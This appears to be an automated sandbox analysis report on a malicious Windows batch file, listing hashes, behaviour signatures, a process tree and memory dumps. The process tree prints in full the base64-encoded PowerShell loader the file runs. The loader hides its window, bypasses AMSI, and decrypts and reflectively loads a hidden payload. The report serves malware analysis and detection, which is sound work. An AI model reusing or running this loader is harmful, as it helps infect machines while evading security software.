d6a5365c045330e093f36f11597e7a49924a52b3f19cbea45d37f1f1fcc2ffa7

General

Target

d6a5365c045330e093f36f11597e7a49924a52b3f19cbea45d37f1f1fcc2ffa7.bat
Size

413KB
MD5

b40af4f36e64a53783d8c3dde233dc1a
SHA1

71a43ec06c566ea2fdbf898104a4c3c02b87bb72
SHA256

d6a5365c045330e093f36f11597e7a49924a52b3f19cbea45d37f1f1fcc2ffa7
SHA512

aa59ea51074b40df9bc183eae7d40e065e0d0e370ccf530dc86f0d6da621e6d857b306c1fd4a9ade7787ebed26cb1f012564a235b8597e04a83a95a531f7cfb3
SSDEEP

6144:+7xGCfsp8mrunqNHsO+AyLT+9lAx1nZJoEU/ghKWv9yEZIYe7uAtYJ5bNrJ8Wpwy:g0amrgUH6NvvZvUY8+9ytiAtqpOWpLf

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2668	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2668	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2736 wrote to memory of 2552	2736	cmd.exe	31
PID 2736 wrote to memory of 2552	2736	cmd.exe	31
PID 2736 wrote to memory of 2552	2736	cmd.exe	31
PID 2552 wrote to memory of 2880	2552	cmd.exe	33
PID 2552 wrote to memory of 2880	2552	cmd.exe	33
PID 2552 wrote to memory of 2880	2552	cmd.exe	33
PID 2552 wrote to memory of 2668	2552	cmd.exe	34
PID 2552 wrote to memory of 2668	2552	cmd.exe	34
PID 2552 wrote to memory of 2668	2552	cmd.exe	34

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\d6a5365c045330e093f36f11597e7a49924a52b3f19cbea45d37f1f1fcc2ffa7.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\d6a5365c045330e093f36f11597e7a49924a52b3f19cbea45d37f1f1fcc2ffa7.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\d6a5365c045330e093f36f11597e7a49924a52b3f19cbea45d37f1f1fcc2ffa7.bat';iex ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("cG93ZXJzaGVsbCAtdyBoaWRkZW47aWV4ICgoJChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnVTFSU1NVNUhVa0ZPUkU5TmFWTlVVa2xPUjFKQlRrUlBUV1ZUVkZKSlRrZFNRVTVFVDAxNElDZ29hVk5VVWtsT1IxSkJUa1JQVFhkVFZGSkpUa2RTUVU1RVQwMXlVMVJTU1U1SFVrRk9SRTlOSUMxVFZGSkpUa2RTUVU1RVQwMVZVMVJTU1U1SFVrRk9SRTlOYzFOVVVrbE9SMUpCVGtSUFRXVlRWRkpKVGtkU1FVNUVUMDFDVTFSU1NVNUhVa0ZPUkU5TllWTlVVa2xPUjFKQlRrUlBUWE5UVkZKSlRrZFNRVTVFVDAxcFUxUlNTVTVIVWtGT1JFOU5ZMU5VVWtsT1IxSkJUa1JQVFZCVFZGSkpUa2RTUVU1RVQwMWhVMVJTU1U1SFVrRk9SRTlOY2xOVVVrbE9SMUpCVGtSUFRYTlRWRkpKVGtkU1FVNUVUMDFwVTFSU1NVNUhVa0ZPUkU5TmJsTlVVa2xPUjFKQlRrUlBUV2RUVkZKSlRrZFNRVTVFVDAwZ0lsTlVVa2xPUjFKQlRrUlBUV2hUVkZKSlRrZFNRVTVFVDAxMGRIQnpVMVJTU1U1SFVrRk9SRTlOT2xOVVVrbE9SMUpCVGtSUFRTOVRWRkpKVGtkU1FVNUVUMDB2VTFSU1NVNUhVa0ZPUkU5Tk1GTlVVa2xPUjFKQlRrUlBUWGhUVkZKSlRrZFNRVTVFVDAwd1UxUlNTVTVIVWtGT1JFOU5MbE5VVWtsT1IxSkJUa1JQVFhOVFZGSkpUa2RTUVU1RVQwMTBVMVJTU1U1SFVrRk9SRTlOTDFOVVVrbE9SMUpCVGtSUFRUaFRWRkpKVGtkU1FVNUVUMDFhVTFSU1NVNUhVa0ZPUkU5TlJGTlVVa2xPUjFKQlRrUlBUV0ZUVkZKSlRrZFNRVTVFVDAwdVUxUlNTVTVIVWtGT1JFOU5kRk5VVWtsT1IxSkJUa1JQVFhoVFZGSkpUa2RTUVU1RVQwMTBVMVJTU1U1SFVrRk9SRTlOSWlrdVEyOXVkR1Z1ZEM1U1pYQnNZV05sS0NkQlFrTW5MQ2NuS1NrZ0xVVnljbTl5UVdOMGFXOXVJRk5wYkdWdWRHeDVRMjl1ZEdsdWRXVTcnKSkpKSAtcmVwbGFjZSAnU1RSSU5HUkFORE9NJywgJycpO3RyeXsgSW52b2tlLVN5c3RlbUFtc2lCeXBhc3MgLURpc2FibGVFVFcgLUVycm9yQWN0aW9uIFN0b3AgfWNhdGNoeyBXcml0ZS1PdXRwdXQgIlRoaXMgc3lzdGVtIGhhcyBhIG1vZGlmaWVkIEFNU0kiIH07ZnVuY3Rpb24gRFpXT00oJHBhcmFtX3Zhcil7JGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOyRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzskYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnRG1mMkdLcjRRanVwMDAxS08rblF6UW1xMzM1azJLdFh5Mkg5UE1GbnlzZz0nKTskYWVzX3Zhci5JVj1bU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCd3emN1VzhYUFVIZzBKcktHMXIzTzZRPT0nKTskSVVSSFo9JGFlc192YXIuQ3JlYXRlRGVjcnlwdG9yKCk7JExKWlRFPSRJVVJIWi5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsMCwkcGFyYW1fdmFyLkxlbmd0aCk7JElVUkhaLkRpc3Bvc2UoKTskYWVzX3Zhci5EaXNwb3NlKCk7JExKWlRFO31mdW5jdGlvbiBkZWNvbXByZXNzX2Z1bmN0aW9uKCRwYXJhbV92YXIpeyRMWEpUQz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOyRWVlBMVj1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JFJHRk9VPU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJExYSlRDLFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskUkdGT1UuQ29weVRvKCRWVlBMVik7JFJHRk9VLkRpc3Bvc2UoKTskTFhKVEMuRGlzcG9zZSgpOyRWVlBMVi5EaXNwb3NlKCk7JFZWUExWLlRvQXJyYXkoKTt9JFVFSkdUPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskcGF5bG9hZDJfdmFyPWRlY29tcHJlc3NfZnVuY3Rpb24gKERaV09NIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJFVFSkdULCA2KS5TdWJzdHJpbmcoMikpKSk7W1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRwYXlsb2FkMl92YXIpLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtjbGVhcjs="))) "
    3⤵
    PID:2880
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2668

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2668-4-0x000007FEF601E000-0x000007FEF601F000-memory.dmp

Filesize
4KB

Download
memory/2668-5-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

Filesize
2.9MB

Download
memory/2668-6-0x0000000001E10000-0x0000000001E18000-memory.dmp

Filesize
32KB

Download
memory/2668-7-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/2668-8-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/2668-9-0x000007FEF601E000-0x000007FEF601F000-memory.dmp

Filesize
4KB

Download
memory/2668-10-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads